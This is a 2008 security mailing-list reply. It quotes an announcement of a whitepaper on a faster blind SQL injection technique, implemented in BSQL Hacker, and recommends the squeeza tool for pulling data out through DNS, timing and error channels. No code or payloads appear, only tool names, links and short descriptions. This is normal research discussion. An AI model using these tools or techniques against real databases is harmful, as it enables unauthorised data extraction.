Hey guys..
* On 19/08/2008, [at 14:38:55 +0100] Ferruh Mavituna [ferruh_at_mavituna.com] seemed to say:
>This is a short whitepaper about a new way to exploit Blind SQL
>Injections. It's implemented in BSQL Hacker (
>http://labs.portcullis.co.uk/application/bsql-hacker/ ).
>
>It is possible gather information from a target server with a 66%
>reduction in the number of requests made of the server (compared to
>normal Blind SQL Injection), requiring two rather than six requests to
>retrieve each char.
if you like, you can also check out squeeza
[http://www.sensepost.com/research/squeeza/] and its associated
whitepaper
[http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf]
squeeza allowed sql injection attacks to extract info via
DNS/Timing/Error Messages also, but its timing method extracted data one
bit at a time with retransmits / state control, effectively allowing for
full binary safe data transfer from the injectable .db
squeeza is written in ruby, and not as pretty as bsql-hacker, but in its
defense _did_ have an ascii art logo..
/mh
--
Haroon Meer, SensePost Information Security |
http://www.sensepost.com/blog/
PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637
** CRM114 Whitelisted by: From haroon_at_sensepost.com **
- application/pgp-signature attachment: stored
Received on Aug 21 2008
Intro
